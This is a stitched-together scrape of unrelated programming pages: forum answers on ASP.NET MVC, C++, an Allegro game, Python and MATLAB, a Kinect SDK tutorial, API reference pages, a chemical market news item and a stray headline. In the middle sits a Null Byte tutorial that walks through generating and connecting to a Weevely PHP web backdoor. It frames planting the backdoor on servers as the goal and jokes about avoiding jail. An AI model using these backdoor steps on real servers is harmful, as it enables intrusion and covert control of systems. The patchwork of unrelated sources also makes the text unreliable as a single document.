I am creating a RESTful webservice using ASP.NET MVC (not ASP.NET Web API). What I want to do is have every method in the controller return their result based on an input parameter (i.e. json or xml). If I were using ASP.NET Web API, the HttpResponseMessage works for this purpose. When I attempt to return an HttpResponseMessage from a controller in ASP.NET MVC, there is no detail. I have read that in this approach, I am supposed to use ActionResult. If I do this, then I need to create an XmlResult that inherits from ActionResult since it is not supported. My question is why HttpResponseMessage does not work the same in both situations. I understand that in Web API, we inherit from ApiController and in ASP.NET MVC we inherit from System.Web.Mvc.Controller. Any help is greatly appreciated. Thanks,

EDIT 1 Much thanks to Fals for his input. My problem was in how to create an empty website and add all of the necessary functionality in. The solution was to use NuGet to get the packages mentioned in the comments and then to follow the steps in How to integrate asp.net mvc to Web Site Project.

Web API is a framework to develop RESTful services, based on HTTP. This framework was separated into another assembly, System.Web.Http, so you can host it anywhere, not only in IIS. Web API works directly with the HTTP request/response, so every controller inherits from IHttpController. MVC has its implementation in System.Web.Mvc, coupled with the ASP.NET Framework, so you must use it inside a web application. Every MVC controller inherits from IController, which makes an abstraction layer between you and the real HttpRequest.
You can still access the request using HttpContext.Response directly in your MVC controller, or, as you said, by inheriting a new ActionResult to do the job, for example:

public class NotFoundActionResult : ActionResult
{
    private string _viewName;

    public NotFoundActionResult() { }

    public NotFoundActionResult(string viewName)
    {
        _viewName = viewName;
    }

    public override void ExecuteResult(ControllerContext context)
    {
        context.HttpContext.Response.StatusCode = 404;
        context.HttpContext.Response.TrySkipIisCustomErrors = true;
        new ViewResult { ViewName = string.IsNullOrEmpty(_viewName) ? "Error" : _viewName }.ExecuteResult(context);
    }
}

This ActionResult is meant to respond with an HTTP error.
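Following the same pattern, the XmlResult mentioned in the question could be sketched as below; the class name and the use of XmlSerializer are my own choices for illustration, not part of ASP.NET MVC itself:

```
public class XmlResult : ActionResult
{
    private readonly object _data;

    public XmlResult(object data)
    {
        _data = data;
    }

    public override void ExecuteResult(ControllerContext context)
    {
        // Serialize the model directly onto the response stream as XML
        context.HttpContext.Response.ContentType = "application/xml";
        if (_data != null)
        {
            var serializer = new System.Xml.Serialization.XmlSerializer(_data.GetType());
            serializer.Serialize(context.HttpContext.Response.Output, _data);
        }
    }
}
```

A controller action could then choose the result based on the format parameter, e.g. return format == "xml" ? (ActionResult)new XmlResult(model) : Json(model, JsonRequestBehavior.AllowGet);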
https://codedump.io/share/mip6wcetGPjo/1/is-it-possible-for-aspnet-mvc-website-not-project-to-return-httpresponsemessage
Hi, I made a simple program that reads 3 names from a text file, each of which has a first name, middle name and surname. I think there would be a few ways to improve the program, although I'm not sure how to go about it. So I have a couple of questions, if anyone could help: 1. When I create the three vectors of strings, if I don't start off by putting something into them, the program crashes when it's run (lines 19-21). How come? Is there any way I can save code by not having to put something in them when I create them? 2. Is there any way of avoiding having to declare three separate vector<string> variables? Would it be possible to do this using just a vector of vectors? Or could you do it using one vector that's just 3 x 3 strings? Would a list of vectors be better? Thanks guys. In the code, the file "names.dat" is just a text file with the following in: Arnold Adam Andrews Brian Barry Buttfield Colin Charles Coleman

Code:
#include <iostream>
#include <string>
#include <vector>
#include <fstream>

#define FIRSTNAME 0
#define MIDNAME 1
#define SURNAME 2

using namespace std;

ifstream file_in("names.dat");

int main()
{
    char charname[99];
    string string_from_file;
    int pos;
    int num_of_lines = 0;
    int typeofname = 0;
    vector<string> first_names;
    vector<string> middle_names;
    vector<string> last_names;
    first_names.push_back(string_from_file);
    middle_names.push_back(string_from_file);
    last_names.push_back(string_from_file);
    while(!file_in.eof()) // Get the names from the names.dat file.
    {
        file_in.getline(charname, 99);
        pos = 0;
        while (typeofname <= SURNAME)
        {
            string_from_file[string_from_file.size()] = NULL;
            string_from_file.erase(0, 99);
            while (((typeofname<=MIDNAME) && (charname[pos] != ' ')) || ((typeofname==SURNAME) && (charname[pos])))
            {
                string_from_file += charname[pos];
                pos++;
            }
            pos++;
            if (typeofname == FIRSTNAME)
                first_names.push_back(string_from_file);
            else if (typeofname == MIDNAME)
                middle_names.push_back(string_from_file);
            else if (typeofname == SURNAME)
                last_names.push_back(string_from_file);
            typeofname++;
        }
        num_of_lines++;
        typeofname = 0;
    }
    for (typeofname = 0; typeofname <= SURNAME; typeofname++) // Output the names by type.
    {
        pos = 0;
        while (pos <= num_of_lines)
        {
            if (typeofname == FIRSTNAME)
                cout << first_names[pos] << endl;
            else if (typeofname == MIDNAME)
                cout << middle_names[pos] << endl;
            else if (typeofname == SURNAME)
                cout << last_names[pos] << endl;
            pos++;
        }
    }
}
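For question 2, one common approach (a sketch, not drop-in code; the function names here are my own) is to keep a single vector of per-line vectors and let std::getline plus a stringstream do the splitting, which also sidesteps the manual character handling entirely:

```cpp
#include <iostream>
#include <sstream>
#include <string>
#include <vector>

// Split one line like "Arnold Adam Andrews" into its three parts.
std::vector<std::string> split_name(const std::string& line)
{
    std::istringstream iss(line);
    std::vector<std::string> parts;
    std::string word;
    while (iss >> word)
        parts.push_back(word);
    return parts;
}

// Read every line of a stream into a vector of name-part vectors,
// so names[i][FIRSTNAME] is the first name on line i, and so on.
std::vector<std::vector<std::string>> read_names(std::istream& in)
{
    std::vector<std::vector<std::string>> names;
    std::string line;
    while (std::getline(in, line))       // getline in the loop condition
        if (!line.empty())               // also avoids the !eof() pitfall
            names.push_back(split_name(line));
    return names;
}
```

With a file you would write std::ifstream file_in("names.dat"); and then auto names = read_names(file_in); — no fixed-size char buffer, no separate vector per column, and nothing needs to be pushed into the vectors before the loop.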
http://cboard.cprogramming.com/cplusplus-programming/116472-reading-multiple-multi-part-strings-text-file.html
hello everyone! I am trying to make a memory match game. So far I have created the game screen with all of the cards on it. However I'm having some trouble trying to figure out three things: (1) How do I create the reverse side of the card and make it flip to the other side when clicked? (2) How do you activate the mouse on the screen so you can click the cards? (3) And is there any way I can display a timer that will count down and stop the game when it gets to zero? How do I create the reverse side of the card Well duh. You draw the back side in a bitmap editor. Then in-game instead of the face of the card you draw the back side. ...and make it flip to the other side when clicked? Check the values of mouse_x, mouse_y and mouse_b&1 and when they indicate a card has been clicked, play the flip animation. A simple way to do this is to progressively stretch the back side to a smaller size in one dimension and then when it reaches 0, progressively draw the face stretched to a bigger size until it reaches full size. How do you activate the mouse on the screen so you can click the cards? install_mouse(). RTFM, the rest of the mouse routines section as well. You can have Allegro or the underlying system draw the mouse cursor for you, or you can draw it yourself with draw_sprite(). And is there any way I can display a timer that will count down and stop the game when it gets to zero? Yes. RTFM, the sections about timers and text output. --sig used to be here Search the forums for "timers". Welcome, jetzfan. (1) How do I create the reverse side of the card and make it flip to the other side when clicked? Sounds like you need to keep track of the card states somewhere; like have an int flipped_flag with possible values 0=facedown and 1=faceup. (2) How do you activate the mouse on the screen so you can click the cards? See Miran's post; install_mouse(); There should be a program in the examples that uses the mouse, you can check that to see how it's done.
(3) And is there any way I can display a timer that will count down and stop the game when it gets to zero? Again, see the examples for using timers. link to my blog ok if i can get the cards to flip over... how can i make them stay facing up if they are a match, then flip back over if they don't match? can someone show me some code to do this? can someone show me some code to do this? C or C++? C Hope that gives you an idea, I've commented out the code you are supposed to implement, but it should give you a framework to start with. ___________________________________[ Facebook ]Microsoft is not the Borg collective. The Borg collective has got proper networking. - planetspace.deBill Gates is in fact Shawn Hargreaves' ßî+çh. - Gideon Weems thank you very much... but how do you do this: init_cards(&cards); // initialize your deck with random card types and two of each and all face down I'm very sorry... I'm not good at this at all... like I said I'm very new at this! There is a ton of ways to do it but here is my example: Untested but I hope it gives you an idea, you go through each type of card and assign it to a random index of your array if it's not already taken. You have to do it twice because there are two of each card. This is just one way of doing it out of many. am I doing this the right way... or is there a simpler way to do this? I feel like I'm going about this the wrong way?! Nothing in code happens magically, this is the way I know and it should work. If you want simpler then I suggest trying something else; get a good C book and read up on stuff before jumping into a graphical game environment. I'm not sure what you mean by simpler. luvzjetz16, maybe you should post the code YOU have written so far. In your first post you say So far I have created the game screen with all of the cards on it. Could you post that code here?
yep... here it is:

#include <allegro.h>

void init();
void deinit();

int main()
{
    init();
    //before the game page there are two other pages that I have no problem with
    //game page
    install_mouse();
    show_mouse(screen);
    int c;
    BITMAP *img3, *cursor, *cursor2, *cursor3, *cursor4, *cursor5, *cursor6;
    img3 = load_bmp("c:\\familyguylogo.bmp", NULL);
    cursor = load_bmp("c:\\PETER.bmp", NULL);
    cursor2 = load_bmp("c:\\LOIS.bmp", NULL);
    //etc.....
    blit(img3, screen, 0,0,0,0,640,480);
    stretch_blit(img3, screen, 0,0, img3->w, img3->h, 0,0, SCREEN_W, SCREEN_H);
    draw_sprite(screen, cursor, 50, 75);
    draw_sprite(screen, cursor2, 50, 200);
    draw_sprite(screen, cursor3, 195, 75);
    draw_sprite(screen, cursor4, 195, 200);
    draw_sprite(screen, cursor5, 337, 75);
    draw_sprite(screen, cursor6, 337, 200);
    draw_sprite(screen, cursor, 480, 75);
    draw_sprite(screen, cursor3, 480, 200);
    draw_sprite(screen, cursor3, 50, 325);
    draw_sprite(screen, cursor4, 195, 325);
    draw_sprite(screen, cursor5, 337, 325);
    draw_sprite(screen, cursor6, 480, 325);
    for(c=0;c<2000000000;c++);
    system("cls")

Use the code mockup tags please. Have you ever heard of arrays? yeah i've heard of arrays. what are mockup tags? If you notice my code is in a scrollable text box, use: [CODE]int c;[/CODE] in lower case to use code blocks in your post. There is a link called HTML Mockup Code at the top of the post text box you can click to see all of the available tags. OK, let me guess - before C you have written your programs in BASIC? My advice is to learn the language you are dealing with. You don't know about the basic features of C, so you are obviously stuck with no knowledge. Just one example: instead of calling your variables cursor, cursor2, cursor3, cursor4, ... you can do the following:

BITMAP *cursor[6];
cursor[0] = load_bmp("...bmp", NULL);
cursor[1] = load_bmp("...bmp", NULL);
...

That way you can say

for (c=0;c<6;c++)
{
    draw_sprite(screen, cursor[c], c*100, 10);
}

or something like that.
And instead of for(c=0;c<2000000000;c++); you can say (in Allegro) rest(2000); which will pause your game for exactly 2 seconds (2000 milliseconds). Of course these are just basic concepts and they won't give you a memory game. You have a lot to learn. First try to cope with C, and then with Allegro. [append] On second thought you could make a memory game by making use of the little programming knowledge you have, but I'm afraid you wouldn't learn anything. Trust me, I've seen huge games from newbies like you; some guys even managed to do (text-based) RPGs without using loops, because they just didn't know them. Nevertheless I encourage you to learn at least the basics of C (;D pun) before continuing. is this better?! Yes, nothing after system("cls") though? I don't know how you managed to get that to compile. sorry, it didn't copy and paste; here it is: this part is created for me when I opened an Allegro C project in Dev-C++ Read Simon's post, he said it best. I'm not sure I can help you much more. ok guys... I've used Dev-C++ for the past semester in college. I do know how to use arrays and things to make a memory game, but I don't know how to make that same game with just BITMAPs and sprites. I do know how to use arrays and things to make a memory game, but I don't know how to make that same game with just BITMAPs and sprites. You have to use both... Make the game like you would with an array, then use Allegro to give it a graphical interface. This is where the creativity comes into programming; to explain better would be to program it for you. To answer your first question, just make variables. So for each card you have a variable "flipped" that indicates if the card is flipped or not. When the user clicks on a card you set flipped to 1 instead of 0. In your drawing code you have an if, or better said, several ifs. You would save a lot of code by using a combination of structs and arrays, but you obviously can do without them.
By declaring ~50 different variables at the beginning of your code. I did that once, and it was no fun.
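The init_cards(&cards) step discussed above can be sketched in plain C without any Allegro calls; the struct layout and names here are my own, following the flipped-flag suggestion from earlier in the thread:

```c
#include <stdlib.h>

#define NUM_TYPES 6
#define NUM_CARDS (NUM_TYPES * 2)

/* Hypothetical card state: type picks the face bitmap to draw,
   flipped is 0=facedown and 1=faceup. */
struct card {
    int type;
    int flipped;
};

/* Fill the deck with two cards of each type at random positions,
   all face down. For each copy, keep picking random slots until a
   free one is found, as suggested in the thread. */
void init_cards(struct card *deck)
{
    int filled[NUM_CARDS] = {0};
    for (int type = 0; type < NUM_TYPES; type++) {
        for (int copy = 0; copy < 2; copy++) {
            int slot;
            do {
                slot = rand() % NUM_CARDS;  /* try a random slot */
            } while (filled[slot]);         /* until it is free  */
            filled[slot] = 1;
            deck[slot].type = type;
            deck[slot].flipped = 0;
        }
    }
}
```

A caller would seed the generator once with srand(time(NULL)); declare struct card deck[NUM_CARDS]; and call init_cards(deck); the drawing loop then checks deck[i].flipped to decide whether to draw the face bitmap or the shared back bitmap.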
https://www.allegro.cc/forums/thread/588872/632314
how to remove the duplicate number of elements in a list? I have a list with repeated elements. How can I delete the duplicate elements in the list using Python? For example:

def formatList(seq):
    seen = set()
    seen_add = seen.add
    return [x for x in seq if not (x in seen or seen_add(x))]

There are loads of topics about this on Stack Overflow and Google. This example is taken from and also keeps the order of your list! A second option could be to create a second list, which only contains the clean values, in case you would like to keep both lists:

for i in mylist:
    if i not in newlist:
        newlist.append(i)

I usually used list_wo_no_duplicate = list(set(list_with_ducplicates)) to remove duplicates. Although I think in most cases there is no harm in not converting the variable back to a list and just leaving it as a set.
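For completeness, on Python 3.7+ plain dicts preserve insertion order, so there is also an order-preserving one-liner built on dict.fromkeys:

```python
def dedup(seq):
    """Remove duplicates while preserving the original order.

    dict keys are unique and (from Python 3.7 on) keep insertion
    order, so this matches the set-based list comprehension above
    but without the seen/seen_add bookkeeping.
    """
    return list(dict.fromkeys(seq))


print(dedup([3, 1, 3, 2, 1]))  # [3, 1, 2]
```

Unlike list(set(...)), this keeps the first occurrence of each element in its original position.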
https://www.odoo.com/forum/help-1/question/how-to-remove-the-duplicate-number-of-elements-in-list-73587
Just a bit of history on binding. In Click 1.4 binding was introduced because people wanted a shortcut for binding and converting input params. This was in the Java 1.4 days, pre annotation. So public fields were used for binding. With Java 1.5, @Bindable was introduced but backward compatibility was kept in place. (If you want to use public fields in your pages that should not be bound, you can set autobinding="annotation" and public fields won't be touched.) So the intention wasn't to support both public fields and @Bindable. It was for preserving backwards compatibility. I understand the argument of splitting @Bindable into two behaviors -> @InputParameter (which sets and coerces the value) vs @AddToModel (which adds the value to the model). The Bindable design also raised these issues: but this work was never completed. Kind regards Bob On 21/11/2010 01:49, Lorenzo Simionato wrote: > On Nov 20, 2010, at 14:35 , Bob Schellink wrote: > > Here what I meant is that if you declare a field as @Bindable you are clearly aware that it can be set in some way by the user. > If you have a public field (ok, it's rare) this is not that obvious. > > Here the XSS was just an example. The fact that one can set a value that I intended only for output is disturbing. > As a couple of other examples: > -suppose the welcomeMessage is the title of the page. It's not nice that one can put an arbitrary title on the page, even if it is escaped properly. > > -suppose one modifies the RequestTypeConverter as explained in the documentation to dynamically load customers from the db.
> In a page one would like to do something with a customer object and then print the details, so we could have something like:
> MyPage.class
> public class MyPage extends Page {
>     @Bindable protected Customer customer = loadCustomer(3);
>
>     public void action() {
>         customer.set.....();
>     }
>
> MyPage.html
> $customer.name
>
> a different customer can be loaded with a request like mypage.htm?customer=56
> (this example is a little weird but is just to get the idea)
>
> These are just examples and maybe if all is handled very carefully by the programmer there would not be any problems.
> However, they demonstrate that it is easy to make something that does not work as intended.
> As a last example consider SQL injections: if you escape the input properly you do not have the problem. On the other hand, to prevent the problem even if you are not that careful, PHP has introduced magic quotes and in Java we have PreparedStatements (yes, I'm simplifying things a lot here!). The concept is that this double role of public fields and ones annotated with @Bindable (as parameters and variables added to the page) does not seem a good idea to me.
>
> --
> Lorenzo
http://mail-archives.apache.org/mod_mbox/click-dev/201011.mbox/%3C4CE86E0A.5060608@gmail.com%3E
27 April 2011 19:30 [Source: ICIS news] HOUSTON (ICIS)--US propylene inventories and refinery operating rates were steady during the week ended 22 April, government data showed on Wednesday. Refinery-sourced propylene inventories stood at 1.573m bbl, down by a slight 0.7% from a week earlier, the US Energy Information Administration (EIA) said. EIA figures refer to non-fuel-use propylene, which is intended for petrochemical manufacturing, including polymer-grade propylene and chemical-grade propylene. Refinery-grade propylene for May traded at 90.75 cents/lb ($2,001/tonne, €1,361/tonne) on Wednesday, up from a deal done at 79.50 cents/lb in the first week of the month. For more on propylene, visit ICIS chemical intelligence
http://www.icis.com/Articles/2011/04/27/9455632/us-propylene-stocks-refinery-rates-steady-eia.html
Unlike sprintf(), the maximum number of characters that can be written to the buffer is specified in snprintf().

snprintf() prototype

int snprintf( char* buffer, size_t buf_size, const char* format, ... );

The snprintf() function writes the string pointed to by format to buffer. The maximum number of characters that can be written is (buf_size-1). After the characters are written, a terminating null character is added. If buf_size is equal to zero, nothing is written and buffer may be a null pointer. It is defined in the <cstdio> header file.

snprintf() Parameters

- buffer: Pointer to the string buffer to write the result.
- buf_size: Specifies the maximum number of characters to be written to buffer, which is buf_size-1.
- format: Pointer to a null-terminated string specifying how to interpret the data, followed by any additional arguments.

snprintf() Return value

If successful, the snprintf() function returns the number of characters that would have been written for a sufficiently large buffer, excluding the terminating null character. On failure it returns a negative value. The output is considered to be written completely if and only if the returned value is nonnegative and less than buf_size.

Example: How snprintf() function works

#include <cstdio>
#include <iostream>
using namespace std;

int main()
{
    char buffer[100];
    int retVal, buf_size = 100;
    char name[] = "Max";
    int age = 23;

    retVal = snprintf(buffer, buf_size, "Hi, I am %s and I am %d years old", name, age);
    if (retVal > 0 && retVal < buf_size)
    {
        cout << buffer << endl;
        cout << "Number of characters written = " << retVal << endl;
    }
    else
        cout << "Error writing to buffer" << endl;
    return 0;
}

When you run the program, the output will be:

Hi, I am Max and I am 23 years old
Number of characters written = 34
https://cdn.programiz.com/cpp-programming/library-function/cstdio/snprintf
Need help with Java Class in Matlab in windows 10 Edited: Ajith Krishna Kanduri on 19 Jun 2020 I have studied examples and had success with the Java class example "HelloWorld" but have not been able to get the Addnumber example shown to work. This example was located on this site. Based on the post, I created a Java class as shown below.

package numberpack;

public class Addnumber
{
    public double add2num(double a1, double a2)
    {
        return a1 + a2;
    }
}

I compiled the class and in MATLAB used:

obj = numberpack.Addnumber

to access the object, but get the message: "Unable to resolve the name numberpack.Addnumber." My path to the class is valid as it is in the file classpath.txt.

Answers (1) Ajith Krishna Kanduri on 19 Jun 2020 Edited: Ajith Krishna Kanduri on 19 Jun 2020 Hi, please try using () parentheses for creating the object:

obj = numberpack.Addnumber()

Please refer to the following discussion thread for reference. Hope this helps in resolving the issue.
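Before debugging the MATLAB side, it can help to confirm from plain Java that the class itself behaves; a minimal check (package declaration omitted here for brevity):

```java
// The Addnumber class as posted, minus the package, so it can be
// compiled and exercised outside MATLAB first. If this works, the
// remaining problem is MATLAB's classpath, not the class itself.
class Addnumber {
    public double add2num(double a1, double a2) {
        return a1 + a2;
    }
}
```

If add2num(2.5, 3.5) returns 6.0 here, check the MATLAB side: one common cause of "Unable to resolve the name" is that classpath.txt must list the folder that *contains* the numberpack directory (the package root), not the numberpack directory itself, and MATLAB generally needs a restart after that file is edited.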
https://it.mathworks.com/matlabcentral/answers/542453-need-help-with-java-class-in-matlab-in-windows-10?s_tid=prof_contriblnk
HIOB: How to Generate Web Backdoors { PHP } Using Weevely in Kali Linux

A backdoor in a computer system. That's what pretty much happens when we all get root on web servers. "Hell yeah, we need backdoors for next time". Sometimes we upload shells and scripts for connect-backs, which are awesome. One day I surfed to a site, got the c99 source, copied it, tried saving it and gosh, the worst happened to me: Windows and Avast won't let me save it, because these shells have their sources and signatures marked up as viruses on nearly every system. The only way one gets a secure shell on a server is through creating your own. Kali Linux has the functionality to generate almost every backdoor type depending on how you want it, { PHP, Android, Windows } to mention a few. But I will be basing this post on Weevely. These shells won't be 100% undetectable, but they could at least get us a better and safer connect-back.

Weevely PHP Only

Fire up Kali, drop to your consoles, or terminals as you may prefer to call them, and let's get some work done.

Weevely

First hit weevely in your terminal to get the help interface:

> weevely

Yeah, that seems promising. Now to generate our backdoor. Weevely allows us to password-protect our shell to prevent unauthorized access. We are generating a backdoor, so we choose option 4 - Generate a PHP Backdoor.

> weevely generate skyvenom

Let's break this down: weevely generate skyvenom simply tells weevely to generate a PHP shell with a password of "skyvenom" in the current directory. Hit 'ls' in your terminal and you should see a weevely-generated file.

> ls

Now you have your backdoor. How you get it onto a web server is not my part, so please try as much as possible not to get caught; otherwise, hmm, let me be precise: between 10 to 15 years in jail, since hacking is now considered a great threat to systems.
Let's assume you got your shell onto a web server. To connect to our shell we use:

> weevely weburl password
> weevely skyvenom

Hmm, it's really awesome to get a shell on your localhost more than any other place in the world. As you can see, I have got a shell on the target in my LAN: 10.0.2.2. OK, guys, have a nice day. Note: For educational purposes only. Hmm, I always see that crap around, "Educational Purposes", but to keep my butt safe from your works: For Educational Purposes. Prompt me if I mistyped or made an error. Jes, my waist... Hm, I wonder how OTW, ghost and others suffer their butts up to get us a nice tut for the day. Thanks guys, and keep the work up. #Sky

6 Responses

Interesting post. Some newbies might not understand the topic; you might try to improve the introduction, as some terms are not very common. Headlines make things easier to read. You might consider explaining how the backdoor is started; however, this is a good reference, thank you for publishing. I see it's your first how-to on Null Byte. Keep it up ;)

Yo Ciuffy, thanks for your comment, and it's kind of my first time, so I hope to clean up my writing skills. #Sky

thnx for sharing... I don't think there is a tool for uploading your shell to a server... wait... I think Metasploit will do that... will it? And by the way... I liked the last part :)

it is giving me this error:

Traceback (most recent call last):
  File "./weevely.py", line 98, in <module>
    main(arguments)
  File "./weevely.py", line 48, in main
    modules.loadmodules(session)
  File "/usr/share/weevely/core/modules.py", line 24, in loadmodules
    (modulegroup, modulename), fromlist="*"
  File "/usr/share/weevely/modules/shell/php.py", line 4, in <module>
    from core.channels.channel import Channel
  File "/usr/share/weevely/core/channels/channel.py", line 8, in <module>
    import sockshandler
ImportError: No module named sockshandler

I tried to install sockshandler but no success.

Follow this link: and utilize Google more.

Can I have some help with how to upload the shell?
https://null-byte.wonderhowto.com/forum/hiob-generate-web-backdoors-php-using-weevely-kali-linux-0158905/
#include <sw_list.h>
#include <sw_types.h>

Header file for the buddy allocator in the TrustZone kernel. Function summaries:

- Gets the size of a pointer; this is needed during realloc.
- Allocates memory at the requested heap index for size bytes.
- Prints the state of the heap allocations: whether a heap is found for this task, the heap size, and the number of free and allocated blocks.
- Prints the heap memory allocation related addresses and sizes.
- Gets the task_id and frees the heap memory corresponding to that task_id.
- Frees privately allocated memory, given the heap_id and the address pointer.
- Initializes the heap memory.
- Gets the task id and allocates memory in the heap corresponding to that task.
- Frees the memory allocated, given the address ptr.
- Performs the initial memory allocation; the heap is also initialized.
- Allocates memory privately for size bytes in the heap identified by the heap_id passed.
http://www.openvirtualization.org/documentation/sw__buddy_8h.html
So what are the things we are going to learn today? Well, we will learn about the system requirements and the installation of the Kinect device, which will ensure that our device is set up properly and we are good to start with development.

Get Ready with Your Development Environment

The current version of the Kinect for Windows SDK beta 1 needs the requirements below to start. Download and Install Kinect for Windows SDK beta: download the SDK beta once you have the development environment setup ready. Please make sure you are downloading the SDK version matching your 64-bit or 32-bit operating system. Once done with the download, install it. You really do not need to plug in your Kinect device during the installation of the SDK.

Know your Kinect Device

Before checking out driver installation, let's have a quick look at the basic hardware elements of Kinect. It contains 3D depth sensors, an RGB camera used for video capturing, an array of mics, and a tilt. The Kinect SDK provides an API to interact with the motorized tilt, which can move the camera up or down 27 degrees. This API is part of the Kinect camera. I will be talking in detail about each of these in my upcoming posts while exploring the APIs for every section.

Plug your Kinect USB cable into the computer. Once Windows detects the device, you will get the LED indicator blinking (yeah, this one is mine). Wait for Windows to recognize the sensors. You can check it out from Control Panel > Device Manager for the installed device driver. By default, with only the USB connection, Windows will detect only the device, as shown in the picture below. But the camera, sensors and audio are yet to be detected. Here is a point: to detect all Kinect elements, the device needs a higher power supply. For that you need to plug the power supply into your Kinect device from an external power source. This enables Windows to detect all the components of the Kinect device. Here is a quick video of the device detection.
Test Your Device

You are done with setup and installation. Let's have a quick test of your device. The Kinect SDK installs a few sample applications; the Sample Skeletal Viewer is one of them. Just run that application, and you will be able to see your view in depth view, skeletal view and camera view. If all of them come up, you are all set to start development.

What else does the Kinect SDK install for developers? Yes, the Kinect SDK also installs one of the best resources to learn Kinect SDK development and explore the APIs. The installation contains the Kinect SDK API reference file. I learned most of the things from there itself.

How an Application Interacts with Kinect

You have already installed the SDK and set up Kinect properly. So before starting with development, let's have a look at how an application interacts with Kinect devices. The Kinect SDK installs a set of APIs to interact with the device; your application will talk to those APIs, and the APIs will talk to the device. The image below shows this flow.

Starting With Application Development

Finally, all the setup is done. Let's start some development with Visual Studio 2010 and create a small application which will initialize the Kinect sensor and display the unique device name.

Fire up a new instance of Visual Studio, select the New Project option from the File menu and select the "WPF Application" template, giving the name as "MyFirstKinectDemo". Click on OK; it will create a blank WPF application for you. Before going ahead, first let's design the UI as shown below.

The code snippet below is the XAML markup for the above design. Well, it's very simple. Now it's time to interact with the Kinect SDK APIs. To start, you first need to add the reference to the Kinect SDK assemblies. Navigate to Solution Explorer, right-click on the project and select "Add Reference". The assembly you need to add is "Microsoft.Research.Kinect.dll". You can search for the Kinect keyword in the assembly search text box to find it faster. This will add Microsoft.Research.Kinect.dll as a reference to your project.
The top level view of this assembly in Object Explorer given as below. These two are the different segment of Kinect APIs. If you want to interact with NUI ( Natural User Interface) API like camera, sensors, Skeleton viewer you have to use the below namespaces. If you want to interact with Kinect Audio Array, you have to include For this application, we will be using NUI API hence we will be adding below namespaces with our code. using Microsoft.Research.Kinect.Nui; First of all you need to define the runtime of Kinect as shown in below, this represents the instance of Kinect Sensor. After that, initialize the runtime with the options you want to use. Below are this Runtime options which Kinect Supports In the next article I will discuss more about the runtime options. For this example, use RuntimeOptions.UseColor to use the RGB camera. Below is complete Code snippet for Initialize and Uninitialized the Kinect Device. /// <summary> /// Interaction logic for MainWindow.xaml /// </summary> public partial class MainWindow : Window { /// <summary> /// /// </summary> Runtime nuiRuntime = new Runtime(); /// <summary> /// Initializes a new instance of the <see cref="MainWindow"/> class. /// </summary> public MainWindow() { InitializeComponent(); } /// <summary> /// Handles the Click event of the buttonInitialize control. /// </summary> /// <param name="sender">The source of the event.</param> /// <param name="e">The <see cref="System.Windows.RoutedEventArgs"/> instance containing the event data.</param> private void buttonInitialize_Click(object sender, RoutedEventArgs e) { // Intialize Kinect Device with UseColor Runtime Option nuiRuntime.Initialize(RuntimeOptions.UseColor); MessageBox.Show("Device Runtime Initialized"); //Get the Camera Device Name labelDeviceName.Content = nuiRuntime.NuiCamera.UniqueDeviceName; } /// <summary> /// Handles the Click event of the buttonUnInitialize control. 
    /// </summary>
    /// <param name="sender">The source of the event.</param>
    /// <param name="e">The <see cref="System.Windows.RoutedEventArgs"/> instance containing the event data.</param>
    private void buttonUnInitialize_Click(object sender, RoutedEventArgs e)
    {
        // Uninitialize the runtime
        nuiRuntime.Uninitialize();
        MessageBox.Show("Device Runtime UnInitialized");
    }
}

That's all. Run the application and click on "Initialize Kinect Runtime"; your application will initialize a runtime for the Kinect device via the SDK APIs, and you will get the message written in the code. After accepting the initialize message, you will get the unique camera device name. Clicking the "Uninitialize Kinect Runtime" button will execute the code above to uninitialize the device.

Download Sample

Well, that's all. To summarize what I have discussed so far: setting up your development environment, installing the Kinect SDK, detecting the device, and a small application to initialize the Kinect device. This is only the beginning; we will talk a lot more about the API, and I will start with something new in my next post. Thanks! Abhijit

Good one.

WhOW… Sir… awesome…. 🙂 don't know when I will ever get my hands on that gift of GOD…

Thanks a lot, man! I successfully developed a whole application, and then the Kinect sensor was unplugged from the power supply, so it wasn't able to initialize the runtime. After searching for over an hour, this is the first post that helped me with the driver setup.

Really good… helped me a lot… thanks.

Your article is very good, but I don't have a Kinect or Xbox — how can I capture video through a Windows C# application?

Hello, I've tried to learn the basics of Kinect coding with your tutorial, but after the change of the API, I've had to change some parts of the code (Runtime = KinectSensor). Unfortunately, C# tells me at "KinectSensor ks = new KinectSensor();" that there is no constructor defined.
I'm very confused about that, so I would be rather pleased if you could help me understand and deal with it. Thanks in advance.

Hi, this article is pretty old and was written against the Beta SDK. With the new SDK you will get a reference to the Kinect as KinectSensor sensor = KinectSensor.KinectSensors[0]; Now you can start the sensor by using sensor.Start(); Let me know if you need any help on this. Would be happy to help.

Thanks a lot, everything is working now. Thank you!

Great! Let me know if you need any further help on this!

Not working with the present SDK, sir!

Hi, the new SDK has many changes in its APIs. I wrote this article with Beta 2.

Sir, please give me sample code for controlling PowerPoint with the Kinect SDK 2.0. Please help me. Thanks.

Hello Abhijit Jana, I am about to start a project using the Kinect sensor for gestures (free control of medical images, i.e. flipping through images, zooming in and out with gestures). Here is some information about my system: Windows 7 64-bit, Intel(R) Core(TM) i5-4200M CPU @ 2.50GHz, 4.00 GB RAM, Visual Studio Express 2013. Is this okay? I have ordered a Kinect sensor. How do I check for the "Windows 7–compatible graphics card that supports DirectX® 9.0c capabilities" requirement? What do you mean by "Microsoft .NET Framework 4.0"? Do I need to download it? Is SDK v1.7 okay in place of the SDK Beta? Thanks in advance for your kind reply.

Which version of Kinect have you ordered? If it is V2, then you may start looking into the Kinect SDK V2.
https://abhijitjana.net/2011/09/14/development-with-kinect-net-sdk-part-i-installation-and-development-environment-setup/
#include <db.h>

int DB_ENV->remove(DB_ENV *, char *db_home, u_int32_t flags);

The DB_ENV->remove function destroys a Berkeley DB environment if it is not currently in use. The environment regions, including any backing files, are removed. Any log or database files and the environment directory are not removed.

The db_home argument to DB_ENV->remove is described in Berkeley DB File Naming.

A DB_ENV handle that has already been used to open an environment should not be used to call the DB_ENV->remove function; a new DB_ENV handle should be created for that purpose. After DB_ENV->remove has been called, regardless of its return, the Berkeley DB environment handle may not be accessed again.

The DB_ENV->remove function returns a non-zero error value on failure and 0 on success.

The DB_ENV->remove function may fail and return a non-zero error for errors specified for other Berkeley DB and C library or system functions. If a catastrophic error has occurred, the DB_ENV->remove function may fail and return DB_RUNRECOVERY, in which case all subsequent Berkeley DB calls will fail in the same way.
http://pybsddb.sourceforge.net/api_c/env_remove.html
Cheap Prices Come with a Learning Curve

